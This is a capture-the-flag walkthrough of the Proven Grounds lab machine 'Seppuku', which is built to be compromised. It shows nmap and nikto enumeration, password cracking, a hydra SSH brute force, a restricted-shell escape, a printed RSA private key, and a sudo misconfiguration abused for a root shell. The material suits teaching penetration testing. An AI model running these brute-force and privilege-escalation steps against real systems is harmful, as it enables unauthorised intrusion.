# Seppuku

This is a walkthrough for the Offensive Security Proven Grounds machine named Seppuku.
Seppuku is a pure beginner friendly box that required basic enumerations and out-of-the-box thinking. 

|![Seppuku Card Info](https://i.imgur.com/rEUisze.png)

## Enumeration

### Nmap
| Ports | Services |
|----|----|
| 21 | ftp vsftpd 3.0.3 |
| 22 | ssh OpenSSH 7.9p1 |
| 80 | http nginx 1.14.2 |
| 139 | NetBIOS Session Samba smbd 3.X - 4.X |
| 445 | SMB Samba smbd 4.9.5 |
| 7080 | ssl/empowerid LiteSpeed | 
| 7601 | Apache httpd 2.4.38 |
| 8088 | LiteSpeed httpd |


```bash
┌──(sicario1337㉿REDSEC)-[/opt/OffSec-PG/Boxes/Seppuku]
└─$ ports=$(nmap -p- --min-rate=1000 192.168.149.90 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
                                                                                                                   
┌──(sicario1337㉿REDSEC)-[/opt/OffSec-PG/Boxes/Seppuku]
└─$ echo $ports
21,22,80,139,445,7080,7601,8088
                                                                                                                   
┌──(sicario1337㉿REDSEC)-[/opt/OffSec-PG/Boxes/Seppuku]
└─$ sudo nmap -sS -sV -sC -O -oX seppuku.nmap.xml -p$ports 192.168.149.90
[sudo] password for offsec: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-27 20:14 BST
Nmap scan report for 192.168.149.90
Host is up (0.21s latency).

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           vsftpd 3.0.3
22/tcp   open  ssh           OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 cd:55:a8:e4:0f:28:bc:b2:a6:7d:41:76:bb:9f:71:f4 (RSA)
|   256 16:fa:29:e4:e0:8a:2e:7d:37:d2:6f:42:b2:dc:e9:22 (ECDSA)
|_  256 bb:74:e8:97:fa:30:8d:da:f9:5c:99:f0:d9:24:8a:d5 (ED25519)
80/tcp   open  http          nginx 1.14.2
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Restricted Content
|_http-server-header: nginx/1.14.2
|_http-title: 401 Authorization Required
139/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn   Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open  ssl/empowerid LiteSpeed
|_http-server-header: LiteSpeed
|_http-title: Did not follow redirect to https://192.168.149.90:7080/
| ssl-cert: Subject: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US
| Not valid before: 2020-05-13T06:51:35
|_Not valid after:  2022-08-11T06:51:35
|_ssl-date: 2021-09-27T19:16:01+00:00; 0s from scanner time.
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
7601/tcp open  http          Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Seppuku
8088/tcp open  http          LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Seppuku
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.18 (91%), Linux 4.15 - 5.6 (90%), Linux 2.6.32 (90%), Linux 2.6.32 or 3.10 (90%), Linux 3.4 (90%), Linux 3.5 (90%), Linux 3.7 (90%), Linux 4.2 (90%), Linux 4.4 (90%), Synology DiskStation Manager 5.1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h00m02s, deviation: 2h00m04s, median: 0s
|_nbstat: NetBIOS name: SEPPUKU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: seppuku
|   NetBIOS computer name: SEPPUKU\x00
|   Domain name: \x00
|   FQDN: seppuku
|_  System time: 2021-09-27T15:15:50-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-09-27T19:15:50
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.29 seconds
```

### FTP
Anonymous access is not enabled on `ftp`, valid credentials are required. Will move on to the next service... 

```bash
┌──(sicario1337㉿REDSEC)-[/opt/OffSec-PG/Boxes/Seppuku]
└─$ ftp 192.168.149.90 
Connected to 192.168.149.90.
220 (vsFTPd 3.0.3)
Name (192.168.149.90:offsec): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> exit
221 Goodbye.
```

### Web Pages
Port 80 requires authentication as shown in the nmap output. Will keep it aside for now.

![Port 7601](https://i.imgur.com/OEDT3Df.png)

![Port 8088](https://i.imgur.com/gi6uINs.png)


### Nikto
Running Nikto on the url `http://192.168.158.90:7601` disclosed a hidden directory `secret`

```bash
┌──(sicario1337㉿REDSEC)-[/opt/OffSec-PG/Boxes/Seppuku]
└─$ nikto -host http://192.168.158.90:7601
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.158.90
+ Target Hostname:    192.168.158.90
+ Target Port:        7601
+ Start Time:         2021-09-28 21:06:19 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: ab, size: 5a58219394d90, mtime: gzip
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS 
+ OSVDB-3268: /c/: Directory indexing found.
+ OSVDB-3092: /c/: This might be interesting...
+ OSVDB-3268: /secret/: Directory indexing found.
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3268: /database/: Directory indexing found.
+ OSVDB-3093: /database/: Databases? Really??
+ OSVDB-3268: /a/: Directory indexing found.
+ OSVDB-3233: /a/: May be Kebi Web Mail administration menu.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /ckeditor/ckeditor.js: CKEditor identified. This file might also expose the version of CKEditor.
+ /ckeditor/CHANGES.md: CKEditor Changelog identified.
+ 7918 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2021-09-28 21:38:14 (GMT1) (1915 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

```

![Secret Directory](https://i.imgur.com/nzLSci3.png)

## Rabbit Hole
This part was meant to take you down the rabbit hole... Feel free to skip it.

### Passwd File
```bash
┌──(sicario1337㉿REDSEC)-[/opt/OffSec-PG/Boxes/Seppuku/files]
└─$ cat passwd.bak                                         
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
...[Snip]...
sshd:x:126:65534::/run/sshd:/usr/sbin/nologin
nm-openconnect:x:127:131:NetworkManager OpenConnect plugin,,,:/var/lib/NetworkManager:/usr/sbin/nologin
rabbit-hole:x:1001:1001:,,,:/home/rabbit-hole:/bin/bash
```

###### Shadow File
```bash
┌──(sicario1337㉿REDSEC)-[/opt/OffSec-PG/Boxes/Seppuku/files]
└─$ cat shadow.bak                   
root:!:18327:0:99999:7:::
daemon:*:17937:0:99999:7:::
bin:*:17937:0:99999:7:::
...[Snip]...
sshd:*:18053:0:99999:7:::
nm-openconnect:*:18053:0:99999:7:::
r@bbit-hole:$6$2/SxUdFc$Es9XfSBlKCG8fadku1zyt/HPTYz3Rj7m4bRzovjHxX4WmIMO7rz4j/auR/V.yCPy2MKBLBahX29Y3DWkR6oT..:18395:0:99999:7:::
```

###### Password Cracking
```bash
┌──(sicario1337㉿REDSEC)-[/opt/OffSec-PG/Boxes/Seppuku/files]
└─$ john -w=./password.lst hash                                           
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
a1b2c3           (?)
1g 0:00:00:00 DONE (2021-09-28 21:23) 33.33g/s 3100p/s 3100c/s 3100C/s 123456
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```
The user **`r@bbit-hole`** gave a hint that this would literally be a rabbit hole and plus the **`@`** character in the 
username just proved it. 

However, as a standard drill, I checked for a password reuse against **`root`** user but it was not successful.

Moving on to the next step of enumeration.

### Enum4linux - Users List Enumeration
Running `enum4linux` helped in discovering valid user accounts
**`seppuku, samurai and tanto`**

```bash
 ========================================================================= 
|    Users on 192.168.158.90 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================= 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-1800040000-2589740123-1483388600
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\seppuku (Local User)
S-1-22-1-1001 Unix User\samurai (Local User)
S-1-22-1-1002 Unix User\tanto (Local User)
```

### Hydra - SSH Brute Force
Having valid user accounts and the password list found in the **`secret`** directory, 
I was able to brute force **`ssh`** using hydra and got a shell on the machine.

```bash
┌──(sicario1337㉿REDSEC)-[/opt/OffSec-PG/Boxes/Seppuku]
└─$ hydra -l seppuku -P files/password.lst -t 40 ssh://192.168.158.90                                        
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-28 21:34:11
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 40 tasks per 1 server, overall 40 tasks, 93 login tries (l:1/p:93), ~3 tries per task
[DATA] attacking ssh://192.168.158.90:22/
[22][ssh] host: 192.168.158.90   "login: seppuku   password: eeyoree"
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 27 final worker threads did not complete until end.
[ERROR] 27 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-09-28 21:34:19
```

## Shell as `seppuku`

```bash      
┌──(sicario1337㉿REDSEC)-[/opt/OffSec-PG/Boxes/Seppuku]
└─$ ssh -o "UserKnownHostsFile=/dev/null" seppuku@seppuku                                                    
The authenticity of host 'seppuku (192.168.158.90)' can't be established.
ECDSA key fingerprint is SHA256:RltTwzbYqqcBz4/ww5KEokNttE+fZwM7l4bvzFaf558.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'seppuku,192.168.158.90' (ECDSA) to the list of known hosts.
seppuku@seppuku's password: 
Linux seppuku 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
seppuku@seppuku:~$ cat local.txt 
39bbxxxxxxxxxxxxxxxxxxxxxxx924b4
seppuku@seppuku:~$ cd /var/www/html
-rbash: cd: restricted
seppuku@seppuku:~$
```
Discovered that bash was restricted, ssh'd back into the machine using the below command to break out of the bash restriction:
```bash
ssh -o "UserKnownHostsFile=/dev/null" seppuku@seppuku -t "bash --noprofile"
```

#### Sudo Privileges
The user's sudo privileges allows him to create a symlink of the root directory however it doesn't give him the permissions to access it. This clearly tells us that its another rabbit hole and there is no need to waste our precious time.

```bash
seppuku@seppuku:~$ sudo -l
Matching Defaults entries for seppuku on seppuku:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User seppuku may run the following commands on seppuku:
    (ALL) NOPASSWD: /usr/bin/ln -sf /root/ /tmp/
seppuku@seppuku:~$ 
```
Looking through the user's home directory, found a hidden **`.passwd`** file that contained a password. Tried the password on the other 2 user accounts and successfully accessed samurai's account.

```bash
seppuku@seppuku:~$ ls -la
total 36
drwxr-xr-x 3 seppuku seppuku 4096 Sep 28 16:43 .
drwxr-xr-x 5 root    root    4096 May 13  2020 ..
-rw------- 1 seppuku seppuku  125 Sep 28 16:43 .bash_history
-rw-r--r-- 1 seppuku seppuku  220 May 13  2020 .bash_logout
-rw-r--r-- 1 seppuku seppuku 3526 May 13  2020 .bashrc
drwx------ 3 seppuku seppuku 4096 May 13  2020 .gnupg
-rw-r--r-- 1 seppuku seppuku   33 Sep 28 15:59 local.txt
-rw-r--r-- 1 root    root      20 May 13  2020 .passwd
-rw-r--r-- 1 seppuku seppuku  807 May 13  2020 .profile
seppuku@seppuku:~$ cat .passwd 
12345685213456!@!@A

seppuku@seppuku:~$ su tanto -
Password: 
su: Authentication failure


seppuku@seppuku:~$ su samurai -
Password: 

samurai@seppuku:/home/seppuku$ 
```


## Shell as `samurai`

#### Sudo Privileges
Samurai's sudo privileges allows him to run **bin** file in tanto's home directory without password prompt.
Unfortunately samurai does not have access to tanto's home directory. 

```bash
┌──(sicario1337㉿REDSEC)-[/opt/OffSec-PG/Boxes/Seppuku]
└─$ ssh -o "UserKnownHostsFile=/dev/null" samurai@seppuku -t "bash --noprofile"                                
The authenticity of host 'seppuku (192.168.158.90)' can't be established.
ECDSA key fingerprint is SHA256:RltTwzbYqqcBz4/ww5KEokNttE+fZwM7l4bvzFaf558.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'seppuku,192.168.158.90' (ECDSA) to the list of known hosts.
samurai@seppuku's password: 
samurai@seppuku:~$ ls -la
total 28
drwxr-xr-x 3 samurai samurai 4096 Sep 28 17:02 .
drwxr-xr-x 5 root    root    4096 May 13  2020 ..
-rw------- 1 samurai samurai   15 Sep 28 17:02 .bash_history
-rw-r--r-- 1 samurai samurai  220 May 13  2020 .bash_logout
-rw-r--r-- 1 samurai samurai 3526 May 13  2020 .bashrc
drwx------ 3 samurai samurai 4096 May 13  2020 .gnupg
-rw-r--r-- 1 samurai samurai  807 May 13  2020 .profile
samurai@seppuku:~$ sudo -l
Matching Defaults entries for samurai on seppuku:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User samurai may run the following commands on seppuku:
    (ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*

samurai@seppuku:~$ ls -ll /home/
total 12
drwxr-xr-x 3 samurai samurai 4096 Oct  1 17:00 samurai
drwxr-xr-x 3 seppuku seppuku 4096 Oct  1 17:00 seppuku
drwxr-xr-x 4 tanto   tanto   4096 Sep  1  2020 tanto
samurai@seppuku:~$ ls -ll /home/tanto
total 0
samurai@seppuku:~$ 
```

###### Further enumeration
Under the web root directory, there is a folder named **`keys`** which contained a private ssh key. 
Copied the ssh key to a file on Kali and successfully ssh'd into the machine as user **`tanto`**.

```bash
samurai@seppuku:~$ ls /var/www/html/
a  c         d         e  h           keys        q  secret              Seppuku.jpg  t
b  ckeditor  database  f  index.html  production  r  secret_file.pcapng  stg          w

samurai@seppuku:/var/www/html$ ls -la keys/
total 16
drwxr-xr-x  2 root root 4096 May 13  2020 .
drwxr-xr-x 19 root root 4096 May 13  2020 ..
-rw-r--r--  1 root root 1680 May 13  2020 private
-rw-r--r--  1 root root 1680 May 13  2020 private.bak

samurai@seppuku:/var/www/html$ cat keys/private.bak 
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAypJlwjKXf0F4YvL2gfwvoUuvB7fuGMMfCe41gLCsTsleOUy2
CJX+oNwVVKPpl6TYI4nXPGbiwfGzoxm0FZa7D9yr83OgwuvMMp83OkVcwL9v+x7a
tK8AAVZ0NjvOPGkvEhB2rPS2mKg1xRKXCM7pA0KSOoDbk9coOpadjg4G0f1YPWrw
p6iLfIErfY2+5hS7QyTQpuRmHuR4eKLF1NFRp8gYuNCVtr0n2Uu6hWuI7RWBGQZJ
Joj8LKjfRRYmKGpyqiGTdRy+8yCyAuT55shuCzXuc+/3HE2jACOD8+pSPKjwxzm4
fuaSfBTUkHfyhiSKIkop2YfIDLKRPM8dGn5zuQIDAQABAoIBADM+s7Vb3Q1ZP54w
foHFjTsNjVqzge0Lt1doxmomx4Aq2sY+DLLBVyfUZSUDTj2JexAKd8OU93o+rcXt
46uudOX/WhR9RMbqpb6MnokEMQGlrCtn08Xvm127RCzQFk0cAsdcGNmKEoMt0mRn
XoPg6/tiJOHd5S5SOKARqAveqoUGUYI3xgsiRpj8CCRIDUgHi9J0++qUeauVw3m3
lvyTnUTw0uf5+sRkI173CUY+ygJapGM7Lg59xzcjEq5H4so0IztQo3o/pOIfeS6W
bqIpY7D63YBGLgpi9JcN/d2bSfafkfhcrAcjPjRXwEFPmYjMbsTBOKcTtCSDVo6/
ho6fTl0CgYEA9F1uIkqxFKIMt2/uK4/1gPOXy/1cjxcsFoah0Ql7d0gj26H6AgXk
nPncIoO1kojPnB+TUy4qz+Bd7teDbkHSaWNJYIVJZQbvskstwgL4+XamiWrJA/Jp
h7y0I0zRxCMBj5yhBNrp6P+f8vtVMpjbKV17jfe6aakfyuayPugHHh8CgYEA1DeM
4lR/+/fUbxtws+aTx8h9TwisYq38D39KNsWkynnb+9pnLCbVbVETtv4sfD/aQfah
R7CxOG+mD4Vryjpk/wwzZeUDzcQpiTx4RsgP6MkFU8knORKfBdimaUpiasWlNWgy
caXR/iA6EmA4jht8vf/+UOUV8GXV9VqDIWUhgycCgYEAvJaGcqyWMUhG7CLT+oal
f5l/Iw0rq7rEabYJmBvrT0k7czt0iK8nmgYy3+gp7ybqoqCzwFQ28itEExn78tGV
o4Pek0EKPY+22TCv5bUJlOz+5bql3AfvbbQyibO1h9tETyMgGXEhaJIvTQSu4deZ
/DiLLCttkDHXuW2FTosfQx0CgYEAkhGOSjapRRBHSxaTE3Cw5UFNZvnsVZu1tCEE
PwD5NVh9HzQr8YrlOnIk5L68deUpYF/WkNbAlLzcizBlifN5kseeFRN188qCYHCb
xPRtZuf+X7ZD5he4FzkRCcXmSeGynjkTB4CAMq+R6RYLt1yaFtk9/gZAfJBLna5o
NbM7Rt8CgYA5oPRfIpKZ5G9LJEAsBUONgBsrpXs+816ZEvBGsqPs/NPhhZMFetKm
RXxYAiEUudMsahP4Woeuxy8kWfM2J2ltwC/HRFuKnKfsHBhsn/FilspYfrafr985
tFnL/K9Z8le1saEGjwCu6zKto7CaFjj2D4Y9ji0sHGBO+tVbtmU/Jg==
-----END RSA PRIVATE KEY-----

samurai@seppuku:/var/www/html$
```

## Shell as `tanto`

```bash
┌──(sicario1337㉿REDSEC)-[/opt/OffSec-PG/Boxes/Seppuku]
└─$ ssh -i key tanto@seppuku -t "bash --noprofile"
Linux seppuku 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tanto@seppuku:~$
```

## Exploitation

## Shell as `root`
Checking tano's home directory, the **`.cgi_bin`** directory did not exist. 
Created the directory and **`bin`** file with the contents **`/bin/bash`** and granted full permissions on them. 
Opened another terminal session with samurai's account, reran the sudo command and spawned a root shell!!!

```bash
tanto@seppuku:~$ mkdir .cgi_bin
tanto@seppuku:~$ echo "/bin/bash" > .cgi_bin/bin
tanto@seppuku:~$ cat .cgi_bin/bin 
/bin/bash
tanto@seppuku:~$ chmod 777 .cgi_bin/
tanto@seppuku:~$ chmod 777 .cgi_bin/bin 
tanto@seppuku:~$ 


samurai@seppuku:~$ sudo -l
Matching Defaults entries for samurai on seppuku:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User samurai may run the following commands on seppuku:
    (ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*

samurai@seppuku:~$ sudo /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
root@seppuku:/home/samurai# cd
root@seppuku:~# ls
proof.txt  root.txt
root@seppuku:~# cat proof.txt 
c622xxxxxxxxxxxxxxxxxxx6e96f0
root@seppuku:~#
```

## I hope you liked the writeup.
